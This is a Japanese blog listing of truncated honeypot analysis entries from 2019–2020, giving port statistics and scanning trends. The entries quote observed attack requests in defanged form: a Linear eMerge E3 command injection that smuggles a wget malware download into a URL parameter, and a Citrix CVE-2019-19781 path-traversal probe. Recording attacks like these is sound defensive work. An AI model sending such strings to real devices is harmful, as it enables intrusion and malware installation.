Citrix製品の脆弱性CVE-2019-19781ですが、WOWHoneypotのmrrules.xmlでレスポンスをきちんと定義してあげると攻撃を観測できました。mrrules.xmlに以下を追加し、art配下にCitrix_smb_conf.txtを追加しています。-----mrrules.xmlの追加分------- <mrr> <meta> <mrrid>20001</mrrid> <enable>Tr</enable></meta></mrr>…

Honeypot簡易分析(2020/1/19)となります。Linear eMerge E3 シリーズの脆弱性を狙った攻撃を検知していました。/card_scan_decoder[.]php?No=30&door=wgethxxp://malwareurl <Honeytrap>Local Port Top 10LocalPort Count1433 426909 件445 1200 件3389 926 件139 559 </honeytrap>…

ポート80番にもCitrix ADC/Citrix Gatewayの脆弱性を狙った通信が来てました。/vpn/[.][.]/vpns/cfg/smb[.]conf <Honeytrap>Local Port Top 10LocalPort Count1433 426909 件445 1200 件3389 926 件139 559 件3391 172 件81 55 件52869 50 件27017 43 件 Remote IP Top </honeytrap>…

Honeypot簡易分析(2020/1/17)となります。 Citrix の脆弱性を狙ったスキャン攻撃はHTTPSの方にちょくちょく検知しています。また、WOWHoneypotのPathの集計にターゲットにしている製品情報を追加するようにしています。/vpn/[.][.]/vpns/ Target:Citrix ADC/…

Honeypot簡易分析(2020/1/16)の簡易分析となります。 PHPUnitのスキャン行為を検知していました。 <Honeytrap> Local Port Top 10 LocalPort Count 1433 481373 件 445 10878 件 3389 610 件 8080 175 件 5432 112 件 52869 83 件 139 65 件 81 62 件 Remote IP Top 10 </honeytrap>…

これまでの投稿していた分析に日付がずれていました。以下、簡易分析となります。 Honeypot簡易分析(2020/1/15) <Honeytrap> Local Port Top 10 LocalPort Count 1433 258482 件 3389 813 件 445 447 件 8443 192 件 2628 76 件 10134 50 件 139 47 件 81 43 件 Remote </honeytrap>…

2020/1/14の簡易分析となります。 <Honeytrap> Local Port Top 10 ペイロードがあるものに限定 LocalPort Count 1433 436677 件 445 639 件 3389 85 件 52869 56 件 81 51 件 139 47 件 8080 43 件 83 41 件 Remote IP Top 10 RemoteIP Count 91[.]211[.]107[.]184 2985</honeytrap>…

Honeypot簡易分析(2020/1/13)の簡易分析となります。 本日は特に変わった通信はありませんでした。 <Honeytrap> Local Port Top 10※ペイロードに文字列が含まれているものを集計 1433 263923 件 445 543 件 8080 148 件 5555 143 件 3389 76 件 81 53 件 139 45 件 5286</honeytrap>…

2020/1/12の簡易分析となります。 ポート 1433の通信が多く、マルウェアはMirai亜種が多かったイメージです。いくつかのマルウェアダウンロード先は既にダウンしているものもありました。 <Honeytrap> Local Port Top 10 LocalPort Count 1433 228478 件 445 396 件 333</honeytrap>…

2020/01/11 の簡易分析となります。今回は、Microsoft SQL Serverで利用されているポート1433宛への通信が増加していました。Honeypot簡易分析<Honeytrap> Local Port Top 10 LocalPort Count 1433 133228 件 445 214 件 3333 125 件 3389 68 件 6443 42 件 161 38 件 5</honeytrap>…

本当に久々の更新になってしました。ハニーポッター せっくちっくです。Splunkのライセンス切れからずるずると解析が遅れてしまい、Splunkの調子が悪く、結局ログから分析することにしました。 ただ、やるなら新しいことをやりたいなーと思ったので、新たな…

かなり、久々の更新となってしました。一部、こちらの手違いでログの欠損が発生してまい、WoWHoneypotおよびHoneytrapのログがロストしてしまいましたので、WoWHoneypotのみの更新となります。 ◾️WoWHoneypot ＜国別検知数および検知数＞ ※ログの取り込みミ…

ちょっと、更新が遅れてしまいましたが、 ハニーポットの簡易分析となります。 ◾️Honeytrap ※80ポートは除く＜国別検知数および検知数＞ ＜検知ポート＞ ポート番号 サービス 検知数 1433 ms-sql-s 174504 5900 vnc 46001 445 smb 31742 22 ssh 24290 23 tel…

Honeypot簡易分析(406-407日目:9/29-10/1)となります。 ◾️Honeytrap ※80ポートは除く ＜国別検知数および検知数＞ ＜ポート検知数＞ ポート番号 サービス 件数 5900 vnc 17730 445 smb 11482 22 ssh 9868 23 telnet 5255 1990 stun-p1 1059 2323 telnet 883 …

Honeypot簡易分析となります。 ◾️Honeytrap ※80ポートは除く ＜国別検知数および検知数＞ ＜ポート検知数＞ ポート番号 サービス 件数 445 smb 8070 22 ssh 5824 23 telnet 3593 5900 vnc 813 3389 rdp 627 1433 ms-sql-s 622 8080 proxy 250 18022 Unknown …

ハニーポット簡易分析の簡易分析となります。 ◾️Honeytrap ※80ポートは除く ＜国別検知数および検知数＞ ＜ポート検知数＞ ポート番号 サービス 件数 445 smb 24901 22 ssh 17892 23 telnet 7937 20053 Unknown 3085 5900 vnc 2340 3389 rdp 2299 1433 ms-sq…

Honeypotの簡易分析となります。 ◾️Honeytrap ※80ポートは除く ＜国別検知数および検知数＞ ＜ポート検知数＞ ポート番号 サービス 件数 1433 ms-sql-s 21371 445 smb 9209 22 ssh 4027 23 telnet 3225 3307 opsession-prxy 3135 3306 mysql 3057 10022 1053…

ハニーポットの簡易分析となります。特に大きな変化はなしでした。 ◾️Honeytrap ※80ポートは除く ＜国別検知数および検知数＞ ＜ポート検知数（前日比）＞ ◾️Honeytrap ※80ポートは除く ＜国別検知数および検知数＞ ＜ポート検知数（前日比）＞ ポート番号 …

最近、なかなか更新できていないorz 反省しつつ、ハニーポットの簡易分析となります。 ◾️Honeytrap ※80ポートは除く ＜国別検知数および検知数＞ 209[.]58.143.46 からのポートスキャンがあり、9/11の検知数が増加していました。https://www.abuseipdb.com/c…

Honeytrapのログが取れていないと調査してみるとiptablesの設定がおかしくうまくログを取得できていませんでした。よって、今回はWoWHoneypot分となります。WoWHoneypot ＜国別検知数および検知数＞ ＜ちょっと気になった通信＞Pulse Secureの脆弱性 (CVE-20…

色々と忙しく、更新が滞ってしまいました。。。。Honeypot簡易分析(359-365日目:8/14-8/20)となります。 ◾️Honeytrap ※80ポートは除く ＜国別検知数および検知数＞ ＜ポート検知数＞ ポート番号 サービス 件数 445 smb 17829 23 telnet 8266 5900 vnc 2314 2…

Honeypot簡易分析(357-358日目:8/11-8/13)となります。◾️Honeytrap ※80ポートは除く＜国別検知数および検知数＞ ＜ポート検知数＞ ポート番号 サービス 件数 445 smb 11055 23 telnet 6645 81 hosts2-ns 1463 5900 vnc 1434 2323 telnet 692 9000 cslistener…

Honeypot簡易分析(353-356日目:8/7-8/10)となります。 ◾️Honeytrap ※80ポートは除く ＜国別検知数および検知数＞ ＜ポート検知数＞ ポート番号 サービス 件数 445 smb 17099 23 telnet 10956 5900 vnc 3070 25 smtp 670 2323 telnet 575 3389 rdp 564 3306 m…

お仕事だったり、CFP書いたりして遅くなりました。。。が、これからも頑張って更新していきたいと思います。近いうちに7月のまとめも書きたいと思います。Honeypot簡易分析(344-352日目:7/29-8/6)の簡易分析となります。 ◾️Honeytrap ※80ポートは除く ＜国別…

Honeypot簡易分析(340-343日目:7/25-28)となります。 ◾️Honeytrap ※80ポートは除く ＜国別検知数および検知数＞ ＜ポート検知数（30日平均比）＞ ポート番号 サービス 件数 件数差(30日平均) 445 smb 15828 11929 23 telnet 7194 5842 5900 vnc 1349 968 312…

Honeypot簡易分析(339日目:7/24)となります。 ◾️Honeytrap ※80ポートは除く ＜国別検知数および検知数＞ ＜ポート検知数（30日平均比）＞ ポート番号 サービス 件数 件数差(30日平均) 445 smb 4135 263 23 telnet 1613 269 5900 vnc 881 521 10022 Unknown 1…

Honeypot簡易分析(338日目:7/23)となります。◾️Honeytrap※80ポートを除く ＜検知数＞ ＜宛先別ポート数＞ ポート番号 サービス 件数 件数差(30日平均) 445 smb 4005 271 23 telnet 1297 -2 2323 telnet 593 472 139 netbios-ssn 204 178 5900 vnc 165 -189 3…

Honeypot簡易分析(336-337日目:7/21-22)今回は平和回でした。 ◾️Honeytrap ※80ポートは除く ＜国別検知数および検知数＞ ＜ポート検知数（30日平均比）＞ ポート番号 サービス 件数 件数差(30日平均) 445 smb 7603 3963 23 telnet 2756 1498 3389 rdp 594 47…

日にちが空いてしまいました。。。。今回はある程度、纏めての分析となります。Honeypot簡易分析(328-335日目:7/13-7/20)◾️Honeytrap※80ポートは除く＜検知数＞ ＜宛先ポート別検知数＞ ポート番号 サービス 件数 件数差(30日平均) 445 smb 32015 28575 23 t…

Honeypot 月次分析6月度となります。来月からはsuricataも導入しているので来月はそちらの分析も出来ればと思っています。 【ハニーポット月次分析】Honeypot 6月度◾️Honeytrap(80ポートは除く) ＜検知数＞ 6/9の検知数が多いですが、これはポート14791宛にR…